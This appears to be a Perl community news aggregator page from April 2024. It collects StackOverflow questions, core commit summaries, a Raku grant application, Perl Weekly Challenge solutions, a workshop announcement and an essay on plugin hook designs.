How to avoid `scalar` of empty array returning `undef`?

Perl questions on StackOverflow - Published by U. Windl on Friday 26 April 2024 16:23

Somewhat related to "How do I return an empty array / array of length 0 in perl?", but still different:

While developing some new code I had a UNITCHECK that compares two "arrays":

One being defined as constant list, while the other is the result of a subroutine call.

Initially both arrays are empty, but scalar returns undef for the empty list, while it returns 0 for the subroutine result.

I don't understand the problem, but I would like to make scalar return 0 for the empty list as well.

The initial error message making me aware was:

Can't use an undefined value as an ARRAY reference ...

So I examined it in the debugger:

NamedFlags::CODE(0xf5da48)(lib/NamedFlags.pm:95):

95: unless (scalar(@{(FLAG_NAMES)}) == scalar(_FLAGS_ENUM->names()));

DB<1> x scalar(@{(FLAG_NAMES)})

0 undef

DB<2> x FLAG_NAMES

empty array

DB<3> x @{(FLAG_NAMES)}

empty array

DB<4> x scalar @{(FLAG_NAMES)}

0 undef

DB<5> x _FLAGS_ENUM->names()

empty array

DB<7> x scalar _FLAGS_ENUM->names()

0 0

DB<8>

The initial definition of FLAG_NAMES is `use constant FLAG_NAMES => ()`.

Maybe the issue is equivalent to this:

DB<8> x scalar ()

Not enough arguments for scalar at (eval 12)[/usr/lib/perl5/5.18.2/perl5db.pl:732] line 2, near "scalar ()"

DB<9> x scalar (())

0 undef

Assigning the empty list to an array variable solved the issue, but if possible I'd like to avoid that:

DB<10> x scalar (@x = ())

0 0
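One way to count the elements of a list constant without naming a temporary array is sketched below; it is an illustration, not a confirmed fix for the module in the question. `FLAG_NAMES` is taken from the question, while `OTHER_NAMES` and the variable names are hypothetical. In `@{(FLAG_NAMES)}` the constant's value is used as an array reference rather than as the list to be counted, which appears to be why an empty list ends up as an undefined reference.

```perl
use strict;
use warnings;

use constant FLAG_NAMES  => ();             # empty list constant, as in the question
use constant OTHER_NAMES => qw(RED GREEN);  # hypothetical non-empty list for comparison

# A list assignment evaluated in scalar context yields the number of
# elements on its right-hand side, so no named array is needed.
my $empty_count = () = FLAG_NAMES;
my $other_count = () = OTHER_NAMES;

# Alternative: build an anonymous array from the list, then take its size.
my $empty_count_ref = scalar @{ [ FLAG_NAMES ] };

print "$empty_count $other_count $empty_count_ref\n";
```

Both forms evaluate the constant in list context first, so an empty list is counted as 0 instead of being treated as a missing reference.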

pod_lib.pl: Remove obsolete exclusion of README.micro

Perl commits on GitHub - Published by ilmari on Friday 26 April 2024 15:34

README.micro was removed with the rest of microperl in commit 12327087bbec7f7feb3121a687442efe210e9dfc, but this reference was missed.

Don't output msg for harmless use of unsupported locale

Perl commits on GitHub - Published by khwilliamson on Friday 26 April 2024 15:23

This fixes GH #21562.

Perl doesn't support all possible locales. Locales that remap elements of the ASCII character set or change their case pairs won't work fully, for example. Hence, some Turkish locales aren't supported because Turkish has different behavior in regard to 'I' and 'i' than other locales that use the Latin alphabet.

The only multi-byte locales that perl supports are UTF-8 ones (and there actually is special handling here to support Turkish). Other multi-byte locales can be dangerous to use, possibly crashing or hanging the Perl interpreter. Locales with shift states are particularly prone to this.

Since perl is written in C, there is always an underlying locale. But most C functions don't look at locales at all, and the Perl interpreter takes care to call the ones that do only within the scope of 'use locale' or for certain function calls in the POSIX:: module that always use the program's current underlying locale.

Prior to this commit, if a dangerous locale underlay the program at startup, a warning to that effect was emitted, even if that locale was never accessed. This commit changes things so that no warning is output unless and until an attempt is actually made to use the dangerous underlying locale.

Pre-existing code also deferred warnings about locales (like the Turkish ones mentioned above) that aren't fully compatible with perl. So it was a simple matter to just modify this code a bit, and add some extra checks for sane locales being in effect.

Grant Application: RakuAST

Perl Foundation News - Published by Saif Ahmed on Friday 26 April 2024 15:18

Another Grant Application from a key Raku developer, Stefan Seifert. A member of the Raku Steering Council, Stefan is also an author of several Perl 5 modules including Inline::Python and (of course) Inline::Perl6. This Grant is to help advance the AST, or Abstract Syntax Tree. This is integral to Raku internals and allows the design and implementation of new language components that can be converted into bytecode for execution by the interpreter or "virtual machine" more easily than by trying to rewrite the interpreter. Here is an excellent intro by Elizabeth Mattijsen.

Project Title: Taking RakuAST over the finish line

Synopsis

There is a grant called RakuAST granted to Jonathan Worthington that is still listed as running. Sadly Jonathan has moved on and is no longer actively developing the Rakudo core. However the goal of his grant is still worthy as it is one of the strategic initiatives providing numerous benefits to the language. I have in fact already taken over his work on RakuAST and over the last two years have pushed some 450+ commits which led to hundreds of spectests passing. This work was done in my spare time which was possible because I had a good and reliable source of income and could at times sneak some Raku work into my day job. I can no longer claim that Raku is in any way connected to my day job and time invested in Raku comes directly out of the pool that should ensure my financial future. In other words, there's a real cost for me and I'd like to ask for this to be offset by way of a grant.

Benefits to Raku

This is mostly directly taken from the RakuAST grant proposal as the goal stays the same:

An AST can be thought of as a document object model for a programming language. The goal of RakuAST is to provide an AST that is part of the Raku language specification, and thus can be relied upon by the language user. Such an AST is a prerequisite for a useful implementation of macros that actually solve practical problems, but also offers further powerful opportunities for the module developer. For example:

- Modules that use Raku as a translation target (for example, ECMA262Regex, a dependency of JSON::Schema) can produce a tree representation to EVAL rather than a string. This is more efficient, more secure, and more robust. (In the standard library, this could also be used to realize a more efficient sprintf implementation.)

- A web framework such as Cro could obtain program elements involved in validation, and translate a typical subset of them into JavaScript (or patterns for the HTML5 pattern attribute) to provide client side validation automatically.

RakuAST will also become the initial internal representation of Raku programs used by Rakudo itself. That in turn gives an opportunity to improve the compiler. The frontend compiler architecture of Rakudo has changed little in the last 10 years. Naturally, those working on it have learned a few things in that time, and implementing RakuAST provides a chance to fold those learnings into the compiler. Better static optimization, use of parallel processing in the compiler, and improvements to memory and time efficiency are all quite reasonable expectations. We have already seen that the better internal structure fixes a few long standing bugs incidentally. However, before many of those benefits can be realized, the work of designing and implementing RakuAST, such that the object model covers the entire semantic and declarational space of the language, must take place. This grant focuses on that work.

Project Details

- Based on previous development velocity I expect to do some 200 more commits before the RakuAST based compiler frontend passes both Rakudo's test and the Raku spectest suites.

- Once the test suites pass, there will be some additional work needed to compile Rakudo itself with the RakuAST-frontend. This work will center around bootstrapping issues.

Considering the amount of work these items already will be, I would specifically exclude work targeted at synthetic AST generation, designs for new macros based on this AST, and anything else that is not strictly necessary to reach the goal of the RakuAST compiler frontend becoming the default.

Schedule

For the test and spectest suites I would continue my tried and proven model of picking the next failing test file and making fixes until it passes. Based on current velocity this will take around 6 months. However there's hope that some community members will return from their side projects and chime in.

Bio

I have been involved in Rakudo development since 2014 when I started development of Inline::Perl5 which brings full two-way interoperability between Raku and Perl. Since then I have helped with every major effort in Rakudo core development like the Great List Refactor, the new dispatch mechanism and full support for unsigned native integers. I have fixed hundreds of bugs in MoarVM including garbage collection issues, race conditions and bugs in the specializer. I have made NativeCall several orders of magnitude faster by writing a special dispatcher and support for JIT compiling native calls. I replaced a slow and memory hungry MAST step in the compilation process by writing bytecode directly, have written most of Rakudo's module loading and repository management code and in general have done everything I could to make Rakudo production worthy. I have also been a member of the Raku Steering Council since its inception.

Supporters

Elizabeth Mattijsen, Geoffrey Broadwell, Nick Logan, Richard Hainsworth

Move full list of extra_paired_delimiters characters out of feature.p…

Perl commits on GitHub - Published by leonerd on Friday 26 April 2024 14:04

Move full list of extra_paired_delimiters characters out of feature.pm into pod/perlop.pod

perl regex negative lookahead replacement with wildcard

Perl questions on StackOverflow - Published by David Peng on Friday 26 April 2024 08:35

Updated with real and more complicated task:

The problem is to substitute a certain pattern with a different result depending on whether the text ends with _ndm.

The input is a text file with certain lines like:

/<random path>/PAT1/<txt w/o _ndm>

/<random path>/PAT1/<txt w/ _ndm>

I need to change those to

/<random path>/PAT1/<sub1>

/<random path>/PAT1/<sub2>_ndm

I wrote a perl command to process it:

perl -i -pe 's#PAT1/.*_ndm#<sub2>_ndm#; s#PAT1/.*(?!_ndm)#<sub1>#' <input_file>

However, it doesn't work as expected: the lines are all substituted to <sub1> instead of <sub2>_ndm.

Original post:

I need to use a shell command to replace any string not ending with _ndm with another string (this is an example):

abc

def

def_ndm

to

ace

ace

def_ndm

I tried with this perl command:

perl -pe 's/.*(?!_ndm)/ace/'

However, I found that the wildcard didn't work with the negative lookahead as I expected. Only if I include the wildcard in the negative pattern does it skip def_ndm correctly; but because a negative lookahead is zero-length, it can no longer replace the normal strings.

Any idea?
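A possible approach, sketched under the assumption that each line should be treated as a whole: in `.*(?!_ndm)` the greedy `.*` first consumes the entire line, and at the end of the line the lookahead succeeds trivially because nothing follows. Anchoring the lookahead at the start of the line lets it inspect the full text before anything is consumed. The function names and the `SUB1`/`SUB2` strings below are placeholders for illustration.

```perl
use strict;
use warnings;

# Replace a whole line with 'ace' unless it ends in '_ndm'.
# The lookahead is anchored at the start of the line, so it inspects
# the entire line before '.*' consumes anything.
sub replace_unless_ndm {
    my ($line) = @_;
    $line =~ s/^(?!.*_ndm$).*$/ace/;
    return $line;
}

# Path variant: try the '_ndm' case first; only if that did not match,
# apply the general case. 'SUB1' and 'SUB2' are placeholder strings.
sub replace_after_pat1 {
    my ($line) = @_;
    $line =~ s{(PAT1/).*_ndm$}{${1}SUB2_ndm}
        or $line =~ s{(PAT1/).*$}{${1}SUB1};
    return $line;
}

print replace_unless_ndm($_), "\n" for qw(abc def def_ndm);
print replace_after_pat1($_), "\n" for '/x/PAT1/foo', '/x/PAT1/foo_ndm';
```

The second function avoids a lookahead altogether by relying on the return value of the first substitution, which can be easier to read when the two replacements differ.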

I am always flattered to be invited to the Perl Toolchain Summit, and reinvigorated in working on MetaCPAN each time.

Currently I am focused on building on the work I and others did last year in setting up Kubernetes for more of MetaCPAN (and other projects) to host on.

Last week I organised the Road map which was the first thing we ran through this morning. I was very fortunate to spend the day with Joel and between us we managed to set up:

- Hetzner (hosting company) volumes auto provisioning in the k8s cluster

- Postgres cluster version (e.g. with replication between nodes)

I had a few discussions with other projects interested in hosting and this has helped us start work on what we need to be able to provision and how, especially with attached storage, which has been somewhat of a challenge, but we are heading towards a solution.

MetaCPAN indexing stopped... again... because our bm-mc-01 server had disk issues (this has been going on for a couple of weeks). Whilst Oalders shut down the server I switched over the puppet setup so bm-mc-02 was the primary postgres DB and ran the cronjobs, which will keep us going for a while longer, but does mean we are reliant on 2 servers, which is not ideal from a failover point of view. Oalders has raised an issue with the hosting company... so we'll see how that works out.

Problem getting Mojolicious routes to work

Perl questions on StackOverflow - Published by ferg on Thursday 25 April 2024 21:55

The following route definition works nicely

sub load_routes {

my($self) = @_;

my $root = $self->routes;

$root->get('/')->to( controller=>'Snipgen', action=>'indexPage');

$root->any('/Snipgen') ->to(controller=>'Snipgen', action=>'SnipgenPage1');

$root->any('/Snipgen/show') ->to(controller=>'Snipgen', action=>'SnipgenPage2');

}

and "./script/snipgen.pl routes -v" gives

/ .... GET ^

/Snipgen .... * Snipgen ^\/Snipgen

/Snipgen/show .... * Snipgenshow ^\/Snipgen\/show

but this fails for 'http://127.0.0.1:3000/Snipgen/' giving page not found

sub load_routes {

my($self) = @_;

my $root = $self->routes;

$root->get('/')->to(controller=>'Snipgen', action=>'indexPage');

my $myaction = $root->any('/Snipgen')->to(controller=>'Snipgen', action=>'SnipgenPage1');

$myaction->any('/show') ->to(controller=>'Snipgen', action=>'SnipgenPage2');

}

and the corresponding "./script/snipgen.pl routes -v" gives

/ .... GET ^

/Snipgen .... * Snipgen ^\/Snipgen

+/show .... * show ^\/show

The SnipgenPageXX subs all have 'return;' as their last line. Any idea what is going wrong?

This week in PSC (145)

blogs.perl.org - Published by Perl Steering Council on Thursday 25 April 2024 20:14

This meeting was done in person at the Perl Toolchain Summit 2024.

- Reviewed game plan for (hopefully) last development release, to be done tomorrow, as well as the stable v5.40 release.

- Reviewed recent issues and PRs to possibly address before next releases.

- Reviewed remaining release blockers for v5.40, and planned how to address them.

- Discussed communication between PSC and P5P and how to improve it.

podlators: load PerlIO before trying to use its functions

Perl commits on GitHub - Published by xenu on Thursday 25 April 2024 14:33

Cherry-picked from https://github.com/rra/podlators/pull/28. Since it's a cherry-pick, podlators was marked as CUSTOMIZED and its version was bumped. Fixes #21841.

/\=/ does not require \ even in older awk

Perl commits on GitHub - Published by Tux on Thursday 25 April 2024 10:26

/\=/ does not require \ even in older awk

GitHub profile of the day: Giuseppe Di Terlizzi (using CodersRank)

dev.to #perl - Published by Gabor Szabo on Thursday 25 April 2024 08:46

I bumped into the GitHub profile of Giuseppe Di Terlizzi (giterlizzi) while doing my research for the other series I run about GitHub Sponsors:

GitHub Sponsors - A series on giving an receiving 💰

Gabor Szabo ・ Apr 20

I wanted to see if there are Perl developers who receive money via GitHub profiles. So I went to the recent CPAN releases page on the CPAN Digger and visited the GitHub account of the authors of the most recent releases. That's how I bumped into GDT.

The new thing I saw in his profile was a graph generated by CodersRank that shows the distribution of languages he used throughout the years.

I jumped on the opportunity and created an account so I'll also have such a nice graph, but there was an error while creating my account. So I can't see that graph yet. 😞

Sponsor Giuseppe Di Terlizzi

Let me use this opportunity to recommend that you sponsor Giuseppe.

File::stat fails with modified $SIG{__DIE__} between different version of Perl

r/perl - Published by /u/Longjumping_Army_525 on Thursday 25 April 2024 01:35

Hi! Asking for some wisdom here...

We have a module that modifies signal handler $SIG{__DIE__} to log information and to die afterwards. Hundreds of scripts relied on this module which worked fine in perl 5.10.1.

Recently we had the opportunity to install several Perl versions but unfortunately a large number of scripts that used to work with Perl 5.10.1 now behave differently:

- Failed in 5.14.4:

$ /home/dev/perl-5.14.4/bin/perl -wc test.pl

RECEIVED SIGNAL - S_IFFIFO is not a valid Fcntl macro at /home/dev/perl-5.14.4/lib/5.14.4/File/stat.pm line 41

- Worked without changes in 5.26.3:

$ /home/dev/perl-5.26.3/bin/perl -wc test.pl

test.pl syntax OK

- Worked without changes in 5.38.2:

$ /home/dev/perl-5.38.2/bin/perl -wc test.pl

test.pl syntax OK

Many of the scripts can only be updated to 5.14.4 due to the huge jump between 5.10 and 5.38, but we are stuck on those failures.

Was there an internal Perl change in 5.14 that causes the failures, while other, more recent versions work without any update to the scripts?

Cheerio!
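A possible explanation, not confirmed in the post: a `$SIG{__DIE__}` handler is also invoked for exceptions raised inside `eval`, so a module that probes for optional features inside `eval` (which File::stat may be doing here; that is an assumption) can trigger a handler that logs and dies. The sketch below shows a handler that checks `$^S` and stays out of the way in that case. The `@LOG` array and the message text are hypothetical stand-ins for the real logging module.

```perl
use strict;
use warnings;

our @LOG;   # hypothetical in-memory log, standing in for the real logger

$SIG{__DIE__} = sub {
    my ($message) = @_;
    # $^S is true inside eval and undefined while code is still being
    # compiled; in both cases leave the exception to the caller.
    return if !defined $^S || $^S;
    push @LOG, "RECEIVED SIGNAL - $message";
    die $message;
};

# A guarded probe, similar in spirit to a module testing for an
# optional feature: the failure is expected and handled locally.
my $ok = eval { die "not a valid macro\n"; 1 };

print "probe failed as expected: $@" unless $ok;
print "log entries: ", scalar(@LOG), "\n";
```

When the handler simply returns, exception processing continues as if no handler were installed, so the `eval` still sees the original error in `$@`.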


How can I reinstall a partially installed Perl module?

Perl questions on StackOverflow - Published by user1067305 on Thursday 25 April 2024 00:14

I'm running Strawberry perl on Win7 and somehow the LWP module got deleted from all my lib folders. I tried to restore it with cpanm, but it says that it's installed. Nevertheless, the LWP folders show only 3 empty subfolders: authen, debug and protocol.

I downloaded simple.pl and pasted it in the LWP folder. My perl programs still can't find it, though I have the use LWP::Simple; command in the files.

How can I install a working copy of LWP without the cpanm hassle??

Perl Weekly Challenge 266: X Matrix

blogs.perl.org - Published by laurent_r on Wednesday 24 April 2024 23:48

These are some answers to the Week 266, Task 2, of the Perl Weekly Challenge organized by Mohammad S. Anwar.

Spoiler Alert: This weekly challenge deadline is due in a few days from now (on April 28, 2024 at 23:59). This blog post provides some solutions to this challenge. Please don’t read on if you intend to complete the challenge on your own.

Task 2: X Matrix

You are given a square matrix, $matrix.

Write a script to find if the given matrix is X Matrix.

A square matrix is an X Matrix if all the elements on the main diagonal and antidiagonal are non-zero and everything else are zero.

Example 1

Input: $matrix = [ [1, 0, 0, 2],

[0, 3, 4, 0],

[0, 5, 6, 0],

[7, 0, 0, 1],

]

Output: true

Example 2

Input: $matrix = [ [1, 2, 3],

[4, 5, 6],

[7, 8, 9],

]

Output: false

Example 3

Input: $matrix = [ [1, 0, 2],

[0, 3, 0],

[4, 0, 5],

]

Output: true

The matrix items on the main diagonal (from top left to bottom right) are those whose row index is equal to the column index, such as @matrix[0][0] or @matrix[1][1], i.e. items 1, 3, 6, and 1 in the first example above.

The matrix items on the anti-diagonal (from top right to bottom left) are those whose row index plus the column index is equal to the matrix size - 1, such as @matrix[0][3] or @matrix[1][2], i.e. items 2, 4, 5 and 7 in the first example above.

X Matrix in Raku

We iterate over the items of the matrix using two nested loops. If an item on a diagonal or an anti-diagonal (see above) is zero, then we return False; if an item not on a diagonal or an anti-diagonal is not zero, then we also return False. If we arrive at the end of the two loops, then we have an X matrix and can return True.

sub is-x-matrix (@m) {

my $end = @m.end; # end = size - 1

for 0..$end -> $i {

for 0..$end -> $j {

if $i == $j or $i + $j == $end { # diag or antidiag

return False if @m[$i][$j] == 0;

} else { # not diag or antidiag

return False if @m[$i][$j] != 0;

}

}

}

# If we got here, it is an X-matrix

return True;

}

my @tests =

[ [1, 0, 0, 2],

[0, 3, 4, 0],

[0, 5, 6, 0],

[7, 0, 0, 1],

],

[ [1, 2, 3],

[4, 5, 6],

[7, 8, 9],

],

[ [1, 0, 2],

[0, 3, 0],

[4, 0, 5],

];

for @tests -> @test {

printf "[%-10s...] => ", "@test[0]";

say is-x-matrix @test;

}

Note that we display only the first row of each test matrix for the sake of getting a better formatting. This program displays the following output:

$ raku ./x-matrix.raku

[1 0 0 2 ...] => True

[1 2 3 ...] => False

[1 0 2 ...] => True

X Matrix in Perl

This is a port to Perl of the above Raku program. Please refer to the previous section if you need further explanations.

use strict;

use warnings;

use feature 'say';

sub is_x_matrix {

my $m = shift;

my $end = scalar @{$m->[0]} - 1; # $end = size - 1

for my $i (0..$end) {

for my $j (0..$end) {

if ($i == $j or $i + $j == $end) { # diag or antidiag

return "false" if $m->[$i][$j] == 0;

} else { # not diag or antidiag

return "false" if $m->[$i][$j] != 0;

}

}

}

# If we got here, it is an X-matrix

return "true";

}

my @tests = (

[ [1, 0, 0, 2],

[0, 3, 4, 0],

[0, 5, 6, 0],

[7, 0, 0, 1],

],

[ [1, 2, 3],

[4, 5, 6],

[7, 8, 9],

],

[ [1, 0, 2],

[0, 3, 0],

[4, 0, 5],

]

);

for my $test (@tests) {

printf "[%-10s...] => ", "@{$test->[0]}";

say is_x_matrix $test;

}

This program displays the following output:

$ perl ./x-matrix.pl

[1 0 0 2 ...] => true

[1 2 3 ...] => false

[1 0 2 ...] => true

Wrapping up

Next week's Perl Weekly Challenge will start soon. If you want to participate in this challenge, please check https://perlweeklychallenge.org/ and make sure you answer the challenge before 23:59 BST (British summer time) on May 5, 2024. And, please, also spread the word about the Perl Weekly Challenge if you can.

Constants under repeated inheritance in Perl: Prototype mismatch: () vs none

Perl questions on StackOverflow - Published by U. Windl on Wednesday 24 April 2024 12:53

First, please excuse this complex question lacking a minimal non-working example; the code is really too complex to derive an MWE from. Anyway, I'll try to explain the problem:

Starting from a working system that uses several classes with multiple and repeated inheritance in Perl (mastering that caused the complexity of the code), I wanted to replace an "enum" implemented by a set of constants with an Enum type I had invented.

That Enum would generate the constants as before, but it would also remember the names as strings, so one could convert names to numbers and back...

In a nutshell this code fragment in Auth::VerifyStatus.pm would create an enum (the real one is more complex):

use Enum v1.0.0;

use constant _VERIFY_STATI => Enum->new('VS_STAT', [qw(OK ERR_BAD ERR_INVALID)]);

The constants generated would be the concatenation of the base name with the list items, like VS_STAT_OK, VS_STAT_ERR_BAD, ...

That package would allow export of the constants as well as the enum, similar to this (complexity removed):

%EXPORT_TAGS = (

'enums' => [qw(_VERIFY_STATI)],

'status_enum' => [_VERIFY_STATI->names()],

);

The names method returns a list of the names (constants) generated by the Enum.

Now I have another package named Auth::Verifier.pm that does use Auth::VerifyStatus v1.7.0 qw(:status_enum); and (as it seems to be necessary) does re-export the status constants as well:

%EXPORT_TAGS = (

'enums' => [qw(Auth::VerifyStatus::_VERIFY_STATI)],

'status_enum' =>

[map { 'Auth::VerifyStatus::' . $_ }

Auth::VerifyStatus::_VERIFY_STATI->names()]);

(I added that map to qualify the package when trying to make it work, because I ran into unexpected problems)

Trying to debug the situation, I arrived nowhere; the only thing I know is that the problem starts after the final 1; in Auth::Verifier when running perl -MAuth::Verifier -de1:

...

Auth::Verifier ONE

Auth::Verifier::CODE(0x2224de0)(lib/Auth/Verifier.pm:261):

261: 1;

DB<1> c

Constant subroutine Auth::VerifyStatus::VS_STAT_OK redefined at -e line 0.

main::BEGIN() called at -e line 0

eval {...} called at -e line 0

Prototype mismatch: sub Auth::VerifyStatus::VS_STAT_OK () vs none at -e line 0.

main::BEGIN() called at -e line 0

eval {...} called at -e line 0

...

(The "ONE" output was added immediately before the 1; at the end of the package for debugging purposes only)

The Exporter is evaluated in a BEGIN block, also as it seemed to be necessary, like this (also in the other package):

our (@EXPORT, @EXPORT_OK, %EXPORT_TAGS, @ISA, $VERSION);

BEGIN {

use Exporter qw(import);

$VERSION = v1.7.0;

$DB::single = 1; # trying to debug this

@ISA = qw(Flags);

%EXPORT_TAGS = (

...

So I'm absolutely clueless how to debug this (too many "line 0") in a reasonable way, or how to fix this. Or am I demanding too much from Perl and should use a real OO language instead?

Additional non-essential Details

Just for reference (as people wondered), here's how I create my constants at runtime (paranoidly structured, I'm afraid):

# query or add symbol table entry

sub _sym($;$)

{

my ($name, $val) = @_;

no strict 'refs';

unless ($#_ > 0) {

if (my ($pkg, $sym) = $name =~ /^(.*::)(.+)$/) {

return ${$pkg}{$sym};

}

confess "_sym: invalid $name\n";

}

*{$name} = $val;

}

# query or add symbol table entry to package

sub _pkg_sym($$;$)

{

my ($pkg, $name, $val) = @_;

unless ($#_ > 1) {

_sym($pkg . '::' . $name);

} else {

_sym($pkg . '::' . $name, $val);

}

}

# add constant

sub _add_const($$$)

{

my $v = $_[2]; # constant value

unless (_pkg_sym($_[0], $_[1])) {

_pkg_sym($_[0], $_[1], sub () { $v });

} else {

carp "_add_const: $_[1] already defined in $_[0]\n";

}

}

SPVM Documentation

dev.to #perl - Published by Yuki Kimoto - SPVM Author on Wednesday 24 April 2024 02:02

Perl Weekly Challenge 266: Uncommon Words

blogs.perl.org - Published by laurent_r on Tuesday 23 April 2024 21:39

These are some answers to the Week 266, Task 1, of the Perl Weekly Challenge organized by Mohammad S. Anwar.

Spoiler Alert: This weekly challenge deadline is due in a few days from now (on April 28, 2024 at 23:59). This blog post provides some solutions to this challenge. Please don’t read on if you intend to complete the challenge on your own.

Task 1: Uncommon Words

You are given two sentences, $line1 and $line2.

Write a script to find all uncommon words in any order in the given two sentences. Return ('') if none found.

A word is uncommon if it appears exactly once in one of the sentences and doesn’t appear in other sentence.

Example 1

Input: $line1 = 'Mango is sweet'

$line2 = 'Mango is sour'

Output: ('sweet', 'sour')

Example 2

Input: $line1 = 'Mango Mango'

$line2 = 'Orange'

Output: ('Orange')

Example 3

Input: $line1 = 'Mango is Mango'

$line2 = 'Orange is Orange'

Output: ('')

We're given two sentences, but the words of these sentences can be processed as one merged collection of words: we only need to find words that appear once in the overall collection.

Uncommon Words in Raku

We use the words method to split the sentences into individual words. Then, in the light of the comment above, we merge the two word lists into a single Bag, using the (+) or ⊎ Baggy addition operator. Finally, we select words that appear only once in the resulting Bag.

sub uncommon ($in1, $in2) {

my $out = $in1.words ⊎ $in2.words; # Baggy addition

return grep {$out{$_} == 1}, $out.keys;

}

my @tests = ('Mango is sweet', 'Mango is sour'),

('Mango Mango', 'Orange'),

('Mango is Mango', 'Orange is Orange');

for @tests -> @test {

printf "%-18s - %-18s => ", @test[0], @test[1];

say uncommon @test[0], @test[1];

}

This program displays the following output:

$ raku ./uncommon.raku

Mango is sweet - Mango is sour => (sour sweet)

Mango Mango - Orange => (Orange)

Mango is Mango - Orange is Orange => ()

Uncommon Words in Perl

This is a port to Perl of the above Raku program. We use a hash instead of a Bag to store the histogram of words.

use strict;

use warnings;

use feature 'say';

sub uncommon {

my %histo;

$histo{$_}++ for map { split /\s+/ } @_;

my @result = grep {$histo{$_} == 1} keys %histo;

return @result ? join " ", @result : "''";

}

my @tests = ( ['Mango is sweet', 'Mango is sour'],

['Mango Mango', 'Orange'],

['Mango is Mango', 'Orange is Orange'] );

for my $test (@tests) {

printf "%-18s - %-18s => ", $test->[0], $test->[1];

say uncommon $test->[0], $test->[1];

}

This program displays the following output:

$ perl ./uncommon.pl

Mango is sweet - Mango is sour => sour sweet

Mango Mango - Orange => Orange

Mango is Mango - Orange is Orange => ''

Wrapping up

Next week's Perl Weekly Challenge will start soon. If you want to participate in this challenge, please check https://perlweeklychallenge.org/ and make sure you answer the challenge before 23:59 BST (British summer time) on May 5, 2024. And, please, also spread the word about the Perl Weekly Challenge if you can.

I understand that many disagree with this statement, but it really makes it easier to build distributions for people who are not monks. I wish the documentation was more detailed.


Announcing The London Perl and Raku Workshop 2024 (LPW)

blogs.perl.org - Published by London Perl Workshop on Monday 22 April 2024 14:33

Hey All,

Yes, we're back, and we'd like to announce this year's LPW:

WHEN: TBC, most likely Saturday 26th October 2024

WHERE: TBC

Please register and submit talks early - it gives us a better idea of numbers. The date is tentative, depending on the venue, but we'd like to aim for the 26th October 2024.

This will be the 20th anniversary of LPW (in terms of years, not number of events). We might try to do something special...

The venue search is currently in progress. The 2019 venue has turned into a boarding school so we can't use that any more due to safeguarding issues. We don't want to go back to the University of Westminster so we are searching for a venue.

If you can help out with the venue search that would be great - does your company have a large enough space to host us? Are you part of a club, organisation, university, school, etc that can provide space? Have you been to an event in central London recently that might be a suitable venue?

Here's roughly what we're looking for. Obviously requirements are a little flexible:

- Central London (Zone 1)

- Saturday 26th October 2024

- Available 9am to 5pm (with access 8am to 6pm)

- A main lecture hall / room with presentation facilities

+ To seat at least 100 people

+ With PA system

- Optional second room, also with presentation facilities

+ To seat at least 35 people

- Breakout room (optional) / reception / welcome area for stands/registration

- Video facilities are not required

- Catering facilities are required

+ Tea, coffee, water, soft drinks, small snacks throughout the day

+ Possibly lunch provided on site with dietary requirement options

~ However if lunch is a significant cost we will leave people to sort that out themselves

Please register, submit talks, think about possible venues, and let us know via email.

Cheers!

The LPW Organisers

Announcing The London Perl & Raku Workshop 2024 (LPW)

r/perl - Published by /u/leejo on Monday 22 April 2024 09:43

At the Koha Hackfest I had several discussions with various colleagues about how to improve the way plugins and hooks are implemented in Koha. I have worked with and implemented various different systems in my ~25 years of Perl, so I have some opinions on this topic.

What are Hooks and Plugins?

When you have some generic piece of code (eg a framework or a big application that will be used by different user groups (like Koha)), people will want to add custom logic to it. But this custom logic will probably not make sense to every user. And you probably don't want all of these weird adaptions in the core code. So you allow users to write their weird adaptions in Plugins, which will be called via Hooks in the core code base. This pattern is used by a lot of software, from eg mod_perl/Apache and media players to JavaScript frontend frameworks like Vue.

Generally, there are two kinds of Hook philosophies: Explicit Hooks, where you add explicit calls to the hook to the core code; and Implicit Hooks, where some magic is used to call Plugins.

Explicit Hooks

Explicit Hooks are rather easy to understand and implement:

package MyApp::Model::SomeThing;

method create ($args) {

$self->call_hook("pre_create", $args);

my $item = $self->resultset("SomeThing")->create( $args );

$self->call_hook("post_create", $args, $item);

return $item;

}So you have a method create which takes some $args. It first calls the pre_create hook, which could munge the $args. Then it does what the Core implementation wants to do (in this case, create a new item in the database). After that it calls the post_create hook which could do further stuff, but now also has the freshly created database row available.

The big advantage of explicit hooks is that you can immediately see which hook is called when & where. The downside is of course that you have to pepper your code with a lot of explicit calls, which can be very verbose, especially once you add error handling and maybe a way for the hook to tell the core code to abort processing etc. Our nice, compact and easy to understand Perl code will end up looking like Go code (where you have to do error handling after each function call).
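The explicit pattern can be sketched in a few lines. The example below is in Python so it runs standalone; it is only an illustration, not Koha's plugin API. HookRegistry, register and the in-memory rows list are hypothetical stand-ins; only the names call_hook, pre_create and post_create come from the text above.

```python
class HookRegistry:
    """Hypothetical registry: plugins register callables under a hook name."""

    def __init__(self):
        self._hooks = {}

    def register(self, name, func):
        self._hooks.setdefault(name, []).append(func)

    def call_hook(self, name, *args):
        # Call every plugin registered for this hook, in registration order.
        for func in self._hooks.get(name, []):
            func(*args)


class SomeThingModel:
    """Core code: the hook calls are visible right where they happen."""

    def __init__(self, hooks):
        self.hooks = hooks
        self.rows = []  # stands in for the database table

    def create(self, args):
        self.hooks.call_hook("pre_create", args)          # plugins may munge args
        item = dict(args, id=len(self.rows) + 1)          # the "core" work
        self.rows.append(item)
        self.hooks.call_hook("post_create", args, item)   # plugins see the new row
        return item


hooks = HookRegistry()
created_log = []
hooks.register("pre_create", lambda args: args.setdefault("status", "new"))
hooks.register("post_create", lambda args, item: created_log.append(item["id"]))

item = SomeThingModel(hooks).create({"title": "Example"})
print(item, created_log)
```

Searching the core code for call_hook finds every extension point, which is the greppability argument in a nutshell.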

Implicit Hooks

Implicit hooks are a bit more magic, because they usually do not need any adaptations to the core code:

package MyApp::Model::SomeThing;

method create ($args) {
    my $item = $self->resultset("Foo")->create( $args );
    return $item
}

There are lots of ways to implement the magic needed.

One well-known one is Object Orientation, where you can "just" provide a subclass which overrides the default method. Of course you will then have to re-implement the whole core method in your subclass, and figure out a way to tell the core system that it should actually use your subclass instead of the default one.

Moose allows for more fine-grained ways to override methods with its method modifiers like before, after and around. If you also add Roles to the mix (or go all in with Parametric Roles) you can build some very abstract base classes (similar to Interfaces in other languages) and leave the actual implementation as an exercise to the user...

Coincidentally, at the German Perl Workshop Ralf Schwab presented how they used AUTOLOAD and a hierarchy of shadow classes to add a Plugin/Hook system to their Cosmo web shop (which seems to be also widely installed and around for quite some time). (I haven't seen the talk, only the slides.)

